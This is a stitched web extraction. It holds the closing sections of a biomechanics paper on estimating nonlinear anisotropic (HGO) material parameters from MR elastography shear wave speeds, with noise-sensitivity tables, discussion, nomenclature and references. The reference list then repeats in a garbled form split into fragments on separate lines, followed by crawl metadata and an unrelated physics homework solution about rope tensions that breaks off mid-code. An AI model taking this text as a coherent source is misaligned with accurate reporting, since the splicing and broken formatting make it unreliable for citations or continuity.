| $\psi$ = 0.02 | $1000 \pm 23$ | $2050 \pm 739$ | $0.077 \pm 0.044$ | $4.8 \pm 0.1$ |
| $\psi$ = 0.03 | $1001 \pm 34$ | $2161 \pm 1107$ | $0.079 \pm 0.057$ | $4.7 \pm 0.2$ |
Table 2
Comparison of HGO model parameter estimates for different noise levels (imposed extension)

| Noise level | $\mu$ (Pa) | $k_1$ (Pa) | $\kappa$ | $k_2$ |
| --- | --- | --- | --- | --- |
| Expected | 1000 | 2000 | 0.083 | 5 |
| $\psi$ = 0.01 | $1000 \pm 11$ | $2007 \pm 390$ | $0.081 \pm 0.023$ | $4.9 \pm 0.1$ |
| $\psi$ = 0.02 | $1000 \pm 20$ | $2044 \pm 752$ | $0.077 \pm 0.043$ | $4.7 \pm 0.3$ |
| $\psi$ = 0.03 | $1002 \pm 32$ | $2068 \pm 1125$ | $0.075 \pm 0.050$ | $4.5 \pm 0.5$ |
As expected, the standard deviation of each parameter estimate increases with noise level. The mean value of some parameters also deviates from the expected value as noise increases. The parameters $k_{2}$ and $\mu_{0}$ are relatively insensitive to the noise level; estimates of $k_{1}$ and $\kappa$ deviate more as noise increases.
## 5 Discussion
In materials that can be modeled as nonlinear, anisotropic, and nearly incompressible, slow and fast wave speeds can be measured from MRE and used to estimate parameters of the material model. In the examples above, theoretical predictions of shear wave speed values in different configurations (undeformed configuration, simple shear in the $XZ$-plane or $YZ$-plane) agreed well with simulation results.
Fast and slow shear wave speeds provide complementary information. The fast shear wave speed is affected by the stiffness of the fibers, while the slow shear wave speed is not. In transversely isotropic materials, displacements in the direction of slow shear wave polarization do not induce fiber stretch. In addition, in the example of this paper, simple shear in the $YZ$-plane (which contains the principal fiber axis, $\mathbf{a}$) directly stretches the fibers and significantly affects fast shear wave speeds. In contrast, simple shear in the $XZ$-plane involves displacements perpendicular to the fibers, and does not stretch the fibers appreciably. The measured wave speed in this condition deviates little from the wave speed in the no-predeformation condition. Extension in the Z-direction also stretches the fibers, which increases shear wave speeds.
Using the closed-form expressions for wave speed, and data from either simulations or experiments, we can estimate the parameters of a nonlinear anisotropic material model. Unlike in linear elastic materials, predeformation plays an important role in determining wave speeds. Without predeformation, the slow shear wave speed varies only with the isotropic shear modulus $\mu$ of the material, and the fast shear wave speed depends on $\mu$, $k_{1}$, and $\kappa$. If predeformations that stretch the fibers are imposed, the fast shear wave speed depends on all the HGO parameters, $\mu$, $k_{1}$, $k_{2}$, $\kappa$, as well as the magnitude of the predeformation.
The accuracy of material parameter estimates is affected by the level of noise in the measured wave speed data. The isotropic shear modulus $\mu$ is the least sensitive to noise because it is derived directly from the slow wave speed with no predeformation. Of the other three parameters, the nonlinearity parameter $k_{2}$ is less sensitive to noise than $k_{1}$ and $\kappa$, because $k_{2}$ has fewer interactions with other factors in the experiment.
One limitation of this paper is that, in computing wave speeds, we do not impose the bilinearity that excludes fibers from resisting infinitesimal levels of dynamic compressive strain. In practice, this assumption could be avoided by imposing a minimal predeformation greater than the wave amplitude. We have considered the original version of the HGO model, which is still widely used. A newer version of the HGO model has recently been proposed [27], which might also be analyzed by this approach. Parameter estimates improve, in terms of both increased accuracy and reduced variance, with more MRE experiments. Balancing the desired precision of the result against the cost of experiments must be considered carefully, as in all experimental studies.
Only one fiber family is considered in this paper, but it is plausible to generalize this approach to estimate wave speeds and material parameters in a material with multiple fiber families. Some special cases can be considered qualitatively. For simplicity, consider a second fiber family with $\phi=-45$ deg. For the situation in which simple shear is imposed in the $YZ$-plane, one fiber family will be stretched and the other will be compressed. In the original HGO model, fibers in compression ($I_{4}<1$) do not contribute to the stress or to the strain energy. Therefore, wave speeds in a material with two fiber families would be the same as with one fiber family. For the same reason, if the material is compressed in the Z-direction ($\lambda<1$), wave speeds are equal to those in an isotropic material because all fibers are under compression. For the idealized example of imposed extension, adding a second fiber family would simply double the effects of a single fiber family. For other configurations the addition of a second fiber family creates orthotropic material symmetry, instead of the transverse isotropy considered in this paper, and would (in general) require further analysis.
Experimental studies that exploit this approach to characterize fibrous soft tissues are planned for future work; these studies would involve superimposing small amplitude shear waves on large finite deformations. Instead of the idealized simple shear deformations of this paper, dense measurements of actual predeformations would need to be combined with regional measurements of shear wave speed. While challenging, this approach promises the possibility of comprehensive, noninvasive tissue characterization in vivo. Tissue may already be in a predeformed state (like white matter in the brain) [28,29], or quasi-static loading might be imposed by respiration (liver [30]), ocular pressure (eye [31]), or external force (intervertebral disk, muscle or breast [32,33]).
## 6 Conclusion
MR elastography can be used, in principle, to estimate parameters of the HGO material model in soft fibrous materials from the speeds of slow and fast shear waves. To demonstrate the ability to obtain accurate results, closed-form expressions for the wave speeds, as functions of predeformation and material parameters, were derived and confirmed by numerical simulations. These results illustrate the feasibility of a new approach to parameter estimation for nonlinear material models of fibrous soft matter.
## Acknowledgment
Financial support for this study was provided by NSF Grant No. CMMI-1727412 and NIH Grant Nos. R01/R56 NS055951 and R01 EB027577.
## Funding Data
• NSF (Funder ID: 10.13039/100000001).
• NIH (Funder ID: 10.13039/100000002).
## Nomenclature
• $a$ = initial fiber direction vector
• $A$ = elasticity tensor
• $c$ = shear wave speed
• $C$ = Cauchy-Green strain tensor
• $c_f$ = fast wave speed under predeformation
• $c_{f0}$ = fast wave speed under no predeformation
• $c_s$ = slow wave speed under predeformation
• $c_{s0}$ = slow wave speed under no predeformation
• $c_{f(\mathrm{noise})}$ = fast wave speed with noise
• $c_{s(\mathrm{noise})}$ = slow wave speed with noise
• $c_0$ = initial shear wave speed
• $E_1, E_2$ = two tensile moduli in TI material
• $F$ = deformation gradient tensor
• $I_1$ = first invariant of Cauchy-Green strain tensor
• $I_4$ = squared stretch in the fiber direction
• $\bar{I}_1$ = modified first invariant
• $\bar{I}_4$ = modified pseudo-invariant
• $K$ = bulk modulus of the material
• $k_1$ = initial slope of stress-strain curve in the HGO model
• $k_2$ = nonlinearity of stress-strain curve in the HGO model
• $L$ = abbreviation in closed-form expression of HGO model
• $L_0$ = number of filters
• $m$ = polarization direction vector
• $M$ = abbreviation in closed-form expression of HGO model
• $m_f$ = fast polarization direction
• $m_s$ = slow polarization direction
• $n$ = wave propagation direction vector
• $N$ = abbreviation in closed-form expression of HGO model
• $Q$ = acoustic tensor
• $W$ = strain energy function
• $\gamma$ = shear predeformation
• $\gamma_{XZ}$ = simple shear ratio in $XZ$-plane
• $\gamma_{YZ}$ = simple shear ratio in $YZ$-plane
• $\zeta_{TI}$ = parameter in TI material model
• $\theta$ = angle between fiber and propagation directions
• $\kappa$ = dispersion parameter of fibers in the HGO model
• $\lambda$ = stretch ratio in Z-direction
• $\mu$ = isotropic shear modulus in the HGO model
• $\mu_0$ = initial value of isotropic shear modulus in the HGO model
• $\mu_1, \mu_2$ = two shear moduli in TI material
• $\rho$ = density of the material
• $\rho_0$ = LFE parameter
• $\tau$ = random value from normal distribution
• $\phi$ = deviation angle between fiber direction and wave propagation direction
• $\phi_{TI}$ = parameter in TI material model
• $\psi$ = noise factor in sensitivity analysis
## References
1. Bensamoun, S. F., Charleux, F., Debernard, L., Themar-Noel, C., and Voit, T., 2015, "Elastic Properties of Skeletal Muscle and Subcutaneous Tissues in Duchenne Muscular Dystrophy by Magnetic Resonance Elastography (MRE): A Feasibility Study," IRBM, 36(1), pp. 4–9. 10.1016/j.irbm.2014.11.002
2. Chamarthi, S. K., Raterman, B., Mazumder, R., Michaels, A., Oza, V. M., Hanje, J., Bolster, B., Jin, N., White, R. D., and Kolipaka, A., 2014, "Rapid Acquisition Technique for MR Elastography of the Liver," Magn. Reson. Imaging, 32(6), pp. 679–683. 10.1016/j.mri.2014.02.013
3. Yang, C., Yin, M., Glaser, K. J., Zhu, X., Xu, K., Ehman, R. L., and Chen, J., 2017, "Static and Dynamic Liver Stiffness: An Ex Vivo Porcine Liver Study Using MR Elastography," Magn. Reson. Imaging, 44, pp. 92–95. 10.1016/j.mri.2017.08.009
4. Kolipaka, A., Wassenaar, P. A., Cha, S., Marashdeh, W. M., Mo, X., Kalra, P., Gans, B., Raterman, B., and Bourekas, E., 2018, "Magnetic Resonance Elastography to Estimate Brain Stiffness: Measurement Reproducibility and Its Estimate in Pseudotumor Cerebri Patients," Clin. Imaging, 51, pp. 114–122. 10.1016/j.clinimag.2018.02.005
5. Guo, J., Hirsch, S., Scheel, M., Braun, J., and Sack, I., 2016, "Three-Parameter Shear Wave Inversion in MR Elastography of Incompressible Transverse Isotropic Media: Application to In Vivo Lower Leg Muscles," Magn. Reson. Med., 75(4), pp. 1537–1545. 10.1002/mrm.25740
6. Labus, K. M., and Puttlitz, C. M., 2016, "An Anisotropic Hyperelastic Constitutive Model of Brain White Matter in Biaxial Tension and Structural-Mechanical Relationships," J. Mech. Behav. Biomed. Mater., 62, pp. 195–208. 10.1016/j.jmbbm.2016.05.003
7. Schmidt, J. L., Tweten, D. J., A. A., Reiter, A. J., Okamoto, R. J., Garbow, J. R., and Bayly, P. V., 2018, "Measurement of Anisotropic Mechanical Properties in Porcine Brain White Matter Ex Vivo Using Magnetic Resonance Elastography," J. Mech. Behav. Biomed. Mater., 79, pp. 30–37. 10.1016/j.jmbbm.2017.11.045
8. Darvish, K. K., and Crandall, J. R., 2001, "Nonlinear Viscoelastic Behavior of Brain Tissue in Oscillatory Shear Deformation," Methods, 23, pp. 633–645. 10.1016/S1350-4533(01)00101-1
9. Panda, S. K., and Buist, M. L., 2018, "A Finite Nonlinear Hyper-Viscoelastic Model for Soft Biological Tissues," J. Biomech., 69, pp. 121–128. 10.1016/j.jbiomech.2018.01.025
10. Ghazy, M., Elgindi, M. B., and Wei, D., 2018, "Analytical and Numerical Investigations of the Collapse of Blood Vessels With Nonlinear Wall Material Embedded in Nonlinear Soft Tissues," Alexandria Eng. J., 57(4), pp. 931–965. 10.1016/j.aej.2018.03.002
11. Volokh, K. Y., 2011, "Modeling Failure of Soft Anisotropic Materials With Application to Arteries," J. Mech. Behav. Biomed. Mater., 4(8), pp. 1582–1594. 10.1016/j.jmbbm.2011.01.002
12. Shearer, T., 2015, "A New Strain Energy Function for the Hyperelastic Modelling of Ligaments and Tendons Based on Fascicle Microstructure," J. Biomech., 48(2), pp. 290–297. 10.1016/j.jbiomech.2014.11.031
13. Ogden, R. W., 1997, "Wave and Vibrations," Non-Linear Elastic Deformations, E. Horwood, Chichester, UK, p. 473.
14. Volokh, K., 2016, "Plane Waves in Incompressible Material," Mechanics of Soft Materials, Springer, Singapore, p. 96.
15. Birch, F., 1961, "The Velocity of Compressional Waves in Rocks to 10 Kilobars—Part 2," J. Geophys. Res., 66(7), pp. 2199–2224. 10.1029/JZ066i007p02199
16. Tweten, D. J., Okamoto, R. J., Schmidt, J. L., Garbow, J. R., and Bayly, P. V., 2015, "Estimation of Material Parameters From Slow and Fast Shear Waves in an Incompressible, Transversely Isotropic Material," J. Biomech., 48(15), pp. 4002–4009. 10.1016/j.jbiomech.2015.09.009
17. Holzapfel, G., 2000, Nonlinear Solid Mechanics: A Continuum Approach for Engineering, Wiley, Chichester, UK.
18. Namani, R., Feng, Y., Okamoto, R. J., Sakiyama-Elbert, S. E., Genin, G. M., and Bayly, P. V., 2012, "Elastic Characterization of Transversely Isotropic Soft Materials by Dynamic Shear and Asymmetric Indentation," ASME J. Biomech. Eng., 134(6), p. 061004. 10.1115/1.4006848
19. Sundararaghavan, H. G., Monteiro, G. A., Lapin, N. A., Chabal, Y. J., Miksan, J. R., and Shreiber, D. I., 2008, "Genipin-Induced Changes in Collagen Gels: Correlation of Mechanical Properties to Fluorescence," J. Biomed. Mater. Res. Part A, 87(2), pp. 308–320. 10.1002/jbm.a.31715
20. Zhang, Y., Xu, B., and Chow, M. J., 2011, "Experimental and Modeling Study of Collagen Scaffolds With the Effects of Crosslinking and Fiber Alignment," Int. J. Biomater., 2011, p. 172389. 10.1155/2011/172389
21. Lai, V. K., Lake, S. P., Frey, C. R., Tranquillo, R. T., and Barocas, V. H., 2012, "Mechanical Behavior of Collagen-Fibrin Co-Gels Reflects Transition From Series to Parallel Interactions With Increasing Collagen Content," ASME J. Biomech. Eng., 134(1), p. 011004. 10.1115/1.4005544
22. Goriely, A., Geers, M. G. D., Holzapfel, G. A., Jayamohan, J., Jérusalem, A., Sivaloganathan, S., Squier, W., van Dommelen, J. A. W., Waters, S., and Kuhl, E., 2015, "Mechanics of the Brain: Perspectives, Challenges, and Opportunities," Biomech. Model. Mechanobiol., 14(5), pp. 931–965. 10.1007/s10237-015-0662-4
23. Budday, S., Sommer, G., Holzapfel, G. A., Steinmann, P., and Kuhl, E., 2017, "Viscoelastic Parameter Identification of Human Brain Tissue," J. Mech. Behav. Biomed. Mater., 74, pp. 463–476. 10.1016/j.jmbbm.2017.07.014
24. Okamoto, R. J., Moulton, M. J., Peterson, S. J., Li, D., Pasque, M. K., and Guccione, J. M., 2000, "Epicardial Suction: A New Approach to Mechanical Testing of the Passive Ventricular Wall," ASME J. Biomech. Eng., 122(5), pp. 479–487. 10.1115/1.1289625
25. Knutsson, H., Westin, C. F., and Granlund, G., 1994, "Local Multiscale Frequency and Bandwidth Estimation," International Conference on Image Processing (ICIP), Austin, TX, Nov. 13–16, pp. 36–40. 10.1109/ICIP.1994.413270
26. Okamoto, R. J., Johnson, C. L., Feng, Y., J. G., and Bayly, P. V., 2014, "MRE Detection of Heterogeneity Using Quantitative Measures of Residual Error and Uncertainty," Proc. SPIE, 9038, p. 90381E. 10.1117/12.2044633
27. Li, K., Ogden, R. W., and Holzapfel, G. A., 2018, "Modeling Fibrous Biological Tissues With a General Invariant That Excludes Compressed Fibers," J. Mech. Phys. Solids, 110, p. 011004. 10.1016/j.jmps.2017.09.005
28. Xu, G., Bayly, P. V., and Taber, L. A., 2009, "Residual Stress in the Adult Mouse Brain," Biomech. Model. Mechanobiol., 8(4), pp. 253–262. 10.1007/s10237-008-0131-4
29. Xu, G., Knutsen, A. K., Dikranian, K., Kroenke, C. D., Bayly, P. V., and Taber, L. A., 2010, "Axons Pull on the Brain, but Tension Does Not Drive Cortical Folding," ASME J. Biomech. Eng., 132(7), p. 071013. 10.1115/1.4001683
30. Yun, M. H., Seo, Y. S., Kang, H. S., Lee, K. G., Kim, J. H., An, H., Yim, H. J., Keum, B., Jeen, Y. T., Lee, H. S., Chun, H. J., Um, S. H., Kim, C. D., and Ryu, H. S., 2011, "The Effect of the Respiratory Cycle on Liver Stiffness Values as Measured by Transient Elastography," J. Viral Hepat., 18(9), pp. 631–636. 10.1111/j.1365-2893.2010.01376.x
31. Nguyen, T.-M., Arnal, B., Song, S., Huang, Z., Wang, R. K., and O'Donnell, M., 2015, "Shear Wave Elastography Using Amplitude-Modulated Acoustic Radiation Force and Phase-Sensitive Optical Coherence Tomography," J. Biomed. Opt., 20(1), p. 016001. 10.1117/1.JBO.20.1.016001
32. Chan, D. D., Gossett, P. C., Butz, K. D., Nauman, E. A., and Neu, C. P., 2014, "Comparison of Intervertebral Disc Displacements Measured Under Applied Loading With MRI at 3.0 T and 9.4 T," J. Biomech., 47(11), pp. 2801–2806. 10.1016/j.jbiomech.2014.05.026
33. Capilnasiu, A., M., Fovargue, D., Patel, D., Holub, O., Bilston, L., Screen, H., Sinkus, R., and Nordsletten, D., 2019, "Magnetic Resonance Elastography in Nonlinear Viscoelastic Materials Under Load," Biomech. Model. Mechanobiol., 18(1), pp. 111–135
,
Hanje
,
J.
,
Bolster
,
B.
,
Jin
,
N.
,
White
,
R. D.
, and
Kolipaka
,
A.
,
2014
, “
Rapid Acquisition Technique for MR Elastography of the Liver
,”
Magn. Reson. Imaging
,
32
(
6
), pp.
679
683
.10.1016/j.mri.2014.02.013
3.
Yang
,
C.
,
Yin
,
M.
,
Glaser
,
K. J.
,
Zhu
,
X.
,
Xu
,
K.
,
Ehman
,
R. L.
, and
Chen
,
J.
,
2017
, “
Static and Dynamic Liver Stiffness: An Ex Vivo Porcine Liver Study Using MR Elastography
,”
Magn. Reson. Imaging
,
44
, pp.
92
95
.10.1016/j.mri.2017.08.009
4.
Kolipaka
,
A.
,
Wassenaar
,
P. A.
,
Cha
,
S.
,
Marashdeh
,
W. M.
,
Mo
,
X.
,
Kalra
,
P.
,
Gans
,
B.
,
Raterman
,
B.
, and
Bourekas
,
E.
,
2018
, “
Magnetic Resonance Elastography to Estimate Brain Stiffness: Measurement Reproducibility and Its Estimate in Pseudotumor Cerebri Patients
,”
Clin. Imaging
,
51
, pp.
114
122
.10.1016/j.clinimag.2018.02.005
5.
Guo
,
J.
,
Hirsch
,
S.
,
Scheel
,
M.
,
Braun
,
J.
, and
Sack
,
I.
,
2016
, “
Three-Parameter Shear Wave Inversion in MR Elastography of Incompressible Transverse Isotropic Media: Application to In Vivo Lower Leg Muscles
,”
Magn. Reson. Med.
,
75
(
4
), pp.
1537
1545
.10.1002/mrm.25740
6.
Labus
,
K. M.
, and
Puttlitz
,
C. M.
,
2016
, “
An Anisotropic Hyperelastic Constitutive Model of Brain White Matter in Biaxial Tension and Structural-Mechanical Relationships
,”
J. Mech. Behav. Biomed. Mater.
,
62
, pp.
195
208
.10.1016/j.jmbbm.2016.05.003
7.
Schmidt
,
J. L.
,
Tweten
,
D. J.
,
,
A. A.
,
Reiter
,
A. J.
,
Okamoto
,
R. J.
,
Garbow
,
J. R.
, and
Bayly
,
P. V.
,
2018
, “
Measurement of Anisotropic Mechanical Properties in Porcine Brain White Matter Ex Vivo Using Magnetic Resonance Elastography
,”
J. Mech. Behav. Biomed. Mater.
,
79
, pp.
30
37
.10.1016/j.jmbbm.2017.11.045
8.
Darvish
,
K. K.
, and
Crandall
,
J. R.
,
2001
, “
Nonlinear Viscoelastic Behavior of Brain Tissue in Oscillatory Shear Deformation
,”
Methods
,
23
, pp.
633
645
.10.1016/S1350-4533(01)00101-1
9.
Panda
,
S. K.
, and
Buist
,
M. L.
,
2018
, “
A Finite Nonlinear Hyper-Viscoelastic Model for Soft Biological Tissues
,”
J. Biomech.
,
69
, pp.
121
128
.10.1016/j.jbiomech.2018.01.025
10.
Ghazy
,
M.
,
Elgindi
,
M. B.
, and
Wei
,
D.
,
2018
, “
Analytical and Numerical Investigations of the Collapse of Blood Vessels With Nonlinear Wall Material Embedded in Nonlinear Soft Tissues
,”
Alexandria Eng. J.
,
57
(
4
), pp.
931
965
.10.1016/j.aej.2018.03.002
11.
Volokh
,
K. Y.
,
2011
, “
Modeling Failure of Soft Anisotropic Materials With Application to Arteries
,”
J. Mech. Behav. Biomed. Mater.
,
4
(
8
), pp.
1582
1594
.10.1016/j.jmbbm.2011.01.002
12.
Shearer
,
T.
,
2015
, “
A New Strain Energy Function for the Hyperelastic Modelling of Ligaments and Tendons Based on Fascicle Microstructure
,”
J. Biomech.
,
48
(
2
), pp.
290
297
.10.1016/j.jbiomech.2014.11.031
13.
Ogden
,
R. W.
,
1997
, “
Wave and Vibrations
,”
Non-Linear Elastic Deformations
,
E. Horwood
,
Chichester, UK
, p.
473
.
14.
Volokh
,
K.
,
2016
, “
Plane Waves in Incompressible Material
,”
Mechanics of Soft Materials
,
Springer
,
Singapore
, p.
96
.
15.
Birch
,
F.
,
1961
, “
The Velocity of Compressional Waves in Rocks to 10 Kilobars—Part 2
,”
J. Geophys. Res.
,
66
(
7
), pp.
2199
2224
.10.1029/JZ066i007p02199
16.
Tweten
,
D. J.
,
Okamoto
,
R. J.
,
Schmidt
,
J. L.
,
Garbow
,
J. R.
, and
Bayly
,
P. V.
,
2015
, “
Estimation of Material Parameters From Slow and Fast Shear Waves in an Incompressible, Transversely Isotropic Material
,”
J. Biomech.
,
48
(
15
), pp.
4002
4009
.10.1016/j.jbiomech.2015.09.009
17.
Holzapfel
,
G.
,
2000
,
Nonlinear Solid Mechanics: A Continuum Approach for Engineering
,
Wiley
,
Chichester, UK
.
18.
Namani
,
R.
,
Feng
,
Y.
,
Okamoto
,
R. J.
,
Sakiyama Elbert
,
S. E.
,
Genin
,
G. M.
, and
Bayly
,
P. V.
,
2012
, “
Elastic Characterization of Transversely Isotropic Soft Materials by Dynamic Shear and Asymmetric Indentation
,”
ASME J. Biomech. Eng.
,
134
(
6
), p.
061004
.10.1115/1.4006848
19.
Sundararaghavan
,
H. G.
,
Monteiro
,
G. A.
,
Lapin
,
N. A.
,
Chabal
,
Y. J.
,
Miksan
,
J. R.
, and
Shreiber
,
D. I.
,
2008
, “
Genipin-Induced Changes in Collagen Gels: Correlation of Mechanical Properties to Fluorescence
,”
J. Biomed. Mater. Res.—Part A
,
87
(
2
), pp.
308
320
.10.1002/jbm.a.31715
20.
Zhang
,
Y.
,
Xu
,
B.
, and
Chow
,
M. J.
,
2011
, “
Experimental and Modeling Study of Collagen Scaffolds With the Effects of Crosslinking and Fiber Alignment
,”
Int. J. Biomater.
,
2011
, p.
172389
.10.1155/2011/172389
21.
Lai
,
V. K.
,
Lake
,
S. P.
,
Frey
,
C. R.
,
Tranquillo
,
R. T.
, and
Barocas
,
V. H.
,
2012
, “
Mechanical Behavior of Collagen-Fibrin Co-Gels Reflects Transition From Series to Parallel Interactions With Increasing Collagen Content
,”
ASME J. Biomech. Eng.
,
134
(
1
), p.
011004
.10.1115/1.4005544
22.
Goriely
,
A.
,
Geers
,
M. G. D.
,
Holzapfel
,
G. A.
,
Jayamohan
,
J.
,
Jérusalem
,
A.
,
Sivaloganathan
,
S.
,
Squier
,
W.
,
van Dommelen
,
J. A. W.
,
Waters
,
S.
, and
Kuhl
,
E.
,
2015
, “
Mechanics of the Brain: Perspectives, Challenges, and Opportunities
,”
Biomech. Model. Mechanobiol.
,
14
(
5
), pp.
931
965
.10.1007/s10237-015-0662-4
23.
Budday
,
S.
,
Sommer
,
G.
,
Holzapfel
,
G. A.
,
Steinmann
,
P.
, and
Kuhl
,
E.
,
2017
, “
Viscoelastic Parameter Identification of Human Brain Tissue
,”
J. Mech. Behav. Biomed. Mater.
,
74
, pp.
463
476
.10.1016/j.jmbbm.2017.07.014
24.
Okamoto
,
R. J.
,
Moulton
,
M. J.
,
Peterson
,
S. J.
,
Li
,
D.
,
Pasque
,
M. K.
, and
Guccione
,
J. M.
,
2000
, “
Epicardial Suction: A New Approach to Mechanical Testing of the Passive Ventricular Wall
,”
ASME J. Biomech. Eng.
,
122
(
5
), pp.
479
487
.10.1115/1.1289625
25.
Knutsson
,
H.
,
Westin
,
C. F.
, and
Granlund
,
G.
,
1994
, “
Local Multiscale Frequency and Bandwidth Estimation
,”
International Conference on Image Processing
(
ICIP
), Austin, TX, Nov. 13–16, pp.
36
40
.10.1109/ICIP.1994.413270
26.
Okamoto
,
R. J.
,
Johnson
,
C. L.
,
Feng
,
Y.
,
,
J. G.
, and
Bayly
,
P. V.
,
2014
, “
MRE Detection of Heterogeneity Using Quantitative Measures of Residual Error and Uncertainty
,”
Proc. SPIE
,
9038
, p.
90381E
. 10.1117/12.2044633
27.
Li
,
K.
,
Ogden
,
R. W.
, and
Holzapfel
,
G. A.
,
2018
, “
Modeling Fibrous Biological Tissues With a General Invariant That Excludes Compressed Fibers
,”
J. Mech. Phys. Solids
,
110
, p.
011004
.10.1016/j.jmps.2017.09.005
28.
Xu
,
G.
,
Bayly
,
P. V.
, and
Taber
,
L. A.
,
2009
, “
Residual Stress in the Adult Mouse Brain
,”
Biomech. Model. Mechanobiol.
,
8
(
4
), pp.
253
262
.10.1007/s10237-008-0131-4
29.
Xu
,
G.
,
Knutsen
,
A. K.
,
Dikranian
,
K.
,
Kroenke
,
C. D.
,
Bayly
,
P. V.
, and
Taber
,
L. A.
,
2010
, “
Axons Pull on the Brain, but Tension Does Not Drive Cortical Folding
,”
ASME J. Biomech. Eng.
,
132
(
7
), p.
071013
.10.1115/1.4001683
30.
Yun
,
M. H.
,
Seo
,
Y. S.
,
Kang
,
H. S.
,
Lee
,
K. G.
,
Kim
,
J. H.
,
An
,
H.
,
Yim
,
H. J.
,
Keum
,
B.
,
Jeen
,
Y. T.
,
Lee
,
H. S.
,
Chun
,
H. J.
,
Um
,
S. H.
,
Kim
,
C. D.
, and
Ryu
,
H. S.
,
2011
, “
The Effect of the Respiratory Cycle on Liver Stiffness Values as Measured by Transient Elastography
,”
J. Viral Hepat.
,
18
(
9
), pp.
631
636
.10.1111/j.1365-2893.2010.01376.x
31.
Nguyen
,
T.-M.
,
Arnal
,
B.
,
Song
,
S.
,
Huang
,
Z.
,
Wang
,
R. K.
, and
O'Donnell
,
M.
,
2015
, “
Shear Wave Elastography Using Amplitude-Modulated Acoustic Radiation Force and Phase-Sensitive Optical Coherence Tomography
,”
J. Biomed. Opt.
,
20
(
1
), p.
016001
.10.1117/1.JBO.20.1.016001
32.
Chan
,
D. D.
,
Gossett
,
P. C.
,
Butz
,
K. D.
,
Nauman
,
E. A.
, and
Neu
,
C. P.
,
2014
, “
Comparison of Intervertebral Disc Displacements Measured Under Applied Loading With MRI at 3.0 T and 9.4 T
,”
J. Biomech.
,
47
(
11
), pp.
2801
2806
.10.1016/j.jbiomech.2014.05.026
33.
Capilnasiu
,
A.
,
,
M.
,
Fovargue
,
D.
,
Patel
,
D.
,
Holub
,
O.
,
Bilston
,
L.
,
Screen
,
H.
,
Sinkus
,
R.
, and
Nordsletten
,
D.
,
2019
, “
Magnetic Resonance Elastography in Nonlinear Viscoelastic Materials Under Load
,”
Biomech. Model. Mechanobiol.
,
18
(
1
), pp.
111
135
.10.1007/s10237-018-1072-1 | 2022-06-27 03:21:59 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 411, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6153632998466492, "perplexity": 2183.357579159436}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103324665.17/warc/CC-MAIN-20220627012807-20220627042807-00528.warc.gz"} |
https://collegephysicsanswers.com/openstax-solutions/figure-438-shows-superhero-and-trusty-sidekick-hanging-motionless-rope-0 | Question
Figure 4.38 shows Superhero and Trusty Sidekick hanging motionless from a rope. Superhero’s mass is 90.0 kg, while Trusty Sidekick’s is 55.0 kg, and the mass of the rope is negligible. (a) Draw a free-body diagram of the situation showing all forces acting on Superhero, Trusty Sidekick, and the rope. (b) Find the tension in the rope above Superhero. (c) Find the tension in the rope between Superhero and Trusty Sidekick. Indicate on your free-body diagram the system of interest used to solve each part.
Question Image
1. See the video for free-body diagrams.
2. $1420 \textrm{ N}$
3. $539 \textrm{ N}$
Solution Video
# OpenStax College Physics Solution, Chapter 4, Problem 34 (Problems & Exercises) (5:00)
Video Transcript
This is College Physics Answers with Shaun Dychko. Our first job in this question is to show all the forces acting on each part of this picture. We have our superhero, which I will denote with subscript *s*, and a trusty sidekick with subscript *t*. The superhero's mass is 90 kilograms and the trusty sidekick has a mass of 55 kilograms. And we're gonna draw a free body diagram of the top portion of rope, which is just the portion here. And then we'll draw a free body diagram of the superhero. And then a free body diagram of this portion of rope here, which is the bottom portion. And then a free body diagram of the trusty sidekick. So that's four free body diagrams. So the top portion of rope has a tension force at the top going upwards. That's the force exerted by the ceiling on the rope. And then we have the same magnitude tension force on the top portion of rope directly downwards. I labeled them both the same because they have the same magnitude. And the free body diagram for our superhero has a single force going upwards, which is this tension in the top portion of rope, and two forces down; one is the tension in the bottom portion of rope pulling down, and he also has the force of gravity on the superhero. So there are two forces downwards. The bottom portion of rope has a tension in the bottom portion of rope upwards and downwards. And the trusty sidekick has only two forces on him; the tension in the bottom portion of rope upwards, and the force of gravity on the trusty sidekick downwards. So in part B, we're going to figure out what is this tension force in the top portion of rope. So consider both of these free body diagrams; one for the superhero and one for the trusty sidekick. We're going to create Newton's second law equations for each of them, knowing that all the net forces are zero in both pictures. So in the first picture, we have the tension force at the top portion of rope directed upwards, so it's positive.
And then minus the tension in the bottom portion of rope pulling the superhero down. And then minus also the force of gravity on the superhero, which is the superhero's mass times acceleration due to gravity. And all of that equals zero because the superhero is stationary and not accelerating. And for the second picture, which we need because we can't solve equation one: there are two unknowns. We don't know the tension in the top portion of rope, nor do we know the tension in the bottom portion of rope. So we only have a single equation with two unknowns, which means we need to look for a second equation in order to substitute for one of these unknowns with something that we do know. So in equation two we're gonna create that substitution. We're gonna say that the tension force in the bottom portion of rope directed upwards, minus the force of gravity on the trusty sidekick, mass of the trusty sidekick times *g*, equals zero. And we can rearrange that for equation two version b, where we've added the force of gravity on the trusty sidekick to both sides. So it cancels on the left and we're left with: the force of tension in the bottom portion of rope is the force of gravity on the trusty sidekick. And so this is something we can plug into equation one. So in equation one version b, I've rewritten equation one, but I've written a substitution in red here where instead of *F tb*, I've written *m t g* in its place. And this is something that we know. And so now this is an equation with only one unknown, and I will solve for it. So we'll add *m t g* and *m s g* to both sides, and also factor out the common factor *g* from these two terms. And we're left with: the force of tension in the top portion of rope is the gravitational field strength times the sum of the masses of the two good guys. So it's 9.80 newtons per kilogram times 55 kilograms plus 90 kilograms, which is 1420 newtons when you have three significant figures.
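The elimination worked through in the transcript reduces to two one-line results, which a quick script can confirm (a sketch; the variable names are mine, not from the video):

```python
g = 9.80      # N/kg, gravitational field strength
m_s = 90.0    # kg, Superhero
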